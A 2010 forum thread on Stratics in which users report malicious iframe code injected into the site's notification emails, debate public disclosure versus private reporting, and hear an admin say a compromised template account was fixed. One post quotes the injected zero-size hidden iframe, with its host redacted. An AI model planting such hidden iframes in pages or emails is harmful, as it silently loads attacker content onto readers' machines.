1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.
  2. Greetings Guest!!

    In order to combat SPAM on the forums, all users are required to have a minimum of 2 posts before they can submit links in any post or thread.

    Dismiss Notice

Damn those untrustworthy scoundrels...

Discussion in 'UHall' started by Llewen, Jun 9, 2010.

  1. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    edit again: Last edit I hope. Apparently the problem was with an account that had access to the email templates. I'm guessing a weak password that was brute forced or something of that nature. Anyway, the problem is cleared up. Please return to the flames and festivities...

    ***

    I'm getting code injected into the subjects of emails I'm receiving from Stratics again. I don't know who to send this to, or I would use a pm to say this, but you need to shut the boards down, clean up the mess, and for the gods' sake, find a patch for the vulnerability that's allowing this to happen, or code a fix for it yourself.

    I don't know what webserver software your host is using, but if Apache is being used, ModSecurity with the GotRoot rules set from Atomicorp is something you might want to look into.

    ***

    edit: I'm not receiving the corrupted emails anymore, and I have found no trace of the url in question or the iframes in the forums, so it's safe to say that this time it wasn't anywhere near as serious as it was the last time.
     
  2. Re: Stratics has been hacked again

    If you're using apache and you get hacked, you should never be allowed near a server again.

    If you're using IIS and you do or don't get hacked, you should never be allowed near a server again.
     
  3. phantus

    phantus Stratics Legend
    Stratics Veteran Stratics Legend

    Joined:
    Jun 11, 2003
    Messages:
    8,369
    Likes Received:
    10
    Re: Stratics has been hacked again

    There is nothing wrong with IIS. It can be secured if you know what the hell you are doing and don't rely on a tool to do it for you.
     
  4. kelmo

    kelmo Old and in the way
    Professional Stratics Veteran Alumni Dread Lord

    Joined:
    May 12, 2008
    Messages:
    17,380
    Likes Received:
    4,702
    Re: Stratics has been hacked again

    What emails are you receiving from Stratics? Be specific please.
     
  5. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Unfortunately with IIS you need a post graduate degree from Microsoft to "know what the hell you are doing"...
     
  6. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    I pm'd Petra with the details. The emails are the reply notifications for threads I am subscribed to. This is the code (url defaced):

    Code:
    <iframe src=http://***.com/data/readme.htm width=0 height=0></iframe>
    It's in the subject lines of the emails, and all through the emails, just like it was before. Note that it is a different url, but it is also WoW related.
     
  7. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    Just noticed it on an email I got too. I sent George a PM on staff boards. Hopefully they can catch it quick.
     
  8. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    The Stratics boards should be disabled.
     
  9. kelmo

    kelmo Old and in the way
    Professional Stratics Veteran Alumni Dread Lord

    Joined:
    May 12, 2008
    Messages:
    17,380
    Likes Received:
    4,702
    Re: Stratics has been hacked again

    Stratics is not harming my computer.
     
  10. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    I've not had any problems from any of the hack attempts either. Just a bunch of ugly frames to look at while browsing the forums.

    Still, hope they can catch it early.
     
  11. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Well typically with these things if Windows and your web browser are fully updated, you should be ok. However, it would still be my recommendation that the boards be disabled until the problem is fixed. I'm not worried about it myself, but there are still those who are less on top of their updates that could be vulnerable if they accidentally click the link.

    It might even be possible for the link to load without it being clicked on. I know I just blocked the url with NoScript, so it is definitely trying to upload a script to my browser.

    edit: Scratch that, with an iframe the link will load without your consent, including any scripts which are a part of the accompanying code, without you having to click on the link if you aren't using something like NoScript.
     
  12. Viper09

    Viper09 Grand Poobah
    Stratics Veteran

    Joined:
    May 16, 2008
    Messages:
    6,680
    Likes Received:
    824
    Re: Stratics has been hacked again

    I haven't noticed anything so far.
     
  13. Beer_Cayse

    Beer_Cayse Guest

    Re: Stratics has been hacked again

    me neither ... am at work: XP/SP2, Firefox with AdBlock Plus. I'll also try from home and report, but if like last time, nothing will occur at this point.
     
  14. Beastmaster

    Beastmaster Guest

    Re: Stratics has been hacked again

    Llewen,

    Thanks for the heads up. Some of us like to browse here from work and these continued threats make it a dangerous proposition for some. In my case I have limits of use at work I must adhere to or face termination. If my PC flags a virus I'll have to explain it. Stratics has always been a safe bet for me in the past but I'm going to have to reconsider now. BTW, I'm not at work at the moment so I'm safe. My own PCs are much better protected than my work PC.
     
  15. Taylor

    Taylor Former Stratics CEO (2011-2014)
    Professional VIP Stratics Veteran Supporter Alumni Campaign Benefactor Alumni

    Joined:
    Oct 21, 2008
    Messages:
    8,023
    Likes Received:
    1,714
    Re: Stratics has been hacked again

    Nothing here either.
     
  16. Black Sun

    Black Sun Grand Poobah
    Stratics Veteran Alumni

    Joined:
    Mar 19, 2003
    Messages:
    5,361
    Likes Received:
    19
    Re: Stratics has been hacked again

    As far as I can tell it's attached to automatically generated emails. However, the test email I sent myself had it attached, but a more recent report that I got on another post was free of any problems.
     
  17. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    I just ran the code from the website and didn't find the url, so it definitely isn't as bad as it was a few weeks ago.
     
  18. George

    George Guest

    Re: Stratics has been hacked again

    Hi guys, I just cleaned our all the email templates that contained the iframe code.

    To be clear, Stratics was not hacked again. The database was clean. What happened was the templates got hacked by an account that had access to them, and that hole is now plugged.

    In the future, please contact myself, Petra or any admin with this. We will respond as quickly as possible. It really does more harm than good by starting inflammatory threads like this one.

    After the problem is understood and fixed, or if we cannot fix it quickly, then is the right time to tell everyone.
     
  19. wanderer1origin

    wanderer1origin Lore Master
    Stratics Veteran Stratics Legend

    Joined:
    May 26, 2005
    Messages:
    1,064
    Likes Received:
    48
    Re: Stratics has been hacked again

    isnt that like having a rabid animal in neighborhood and not alerting anyone till it is caught!!!
     
  20. Taylor

    Taylor Former Stratics CEO (2011-2014)
    Professional VIP Stratics Veteran Supporter Alumni Campaign Benefactor Alumni

    Joined:
    Oct 21, 2008
    Messages:
    8,023
    Likes Received:
    1,714
    Re: Stratics has been hacked again

    Nope.
     
  21. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    I kinda want to know why I can be on here for months and not see a pop up, but then times like today i click on Uhall and get a random ass pop up ad.
     
  22. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    Well to be perfectly honest, that was the reason why I chose to post a thread, rather than just sending a pm. Beyond the fact that there is no guarantee the mod I send a pm to is going to view my pm in a timely fashion, I happen to be of the opinion that if there is a problem it is better for people to know about it so that they can take precautions if they feel it is necessary. That was the reason why I also posted immediately in the Ultimate Online forums.
     
  23. TheScoundrelRico

    TheScoundrelRico Stratics Legend
    Stratics Veteran Alumni Stratics Legend Secret Society

    Joined:
    Aug 12, 2001
    Messages:
    35,539
    Likes Received:
    908
  24. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    Re: Stratics has been hacked again


    Was that a typo of sorts?
     
  25. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    Re: Stratics has been hacked again

    No it was not... A.K.A. UO Forums.
     
  26. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    was just checking :)
     
  27. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    ... :)
     
  28. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    fine fine! sorry for asking =(
     
  29. Llewen

    Llewen Grand Inquisitor
    Professional Stratics Veteran Stratics Legend Campaign Supporter

    Joined:
    Mar 3, 2006
    Messages:
    4,699
    Likes Received:
    200
    *sigh*

    I think I need to go to bed...

    *yawns*
     
  30. Derium of ls

    Derium of ls Slightly Crazed
    Stratics Veteran

    Joined:
    May 29, 2008
    Messages:
    1,431
    Likes Received:
    21
    but slap happy forum posting is the next best thing to drunk dialing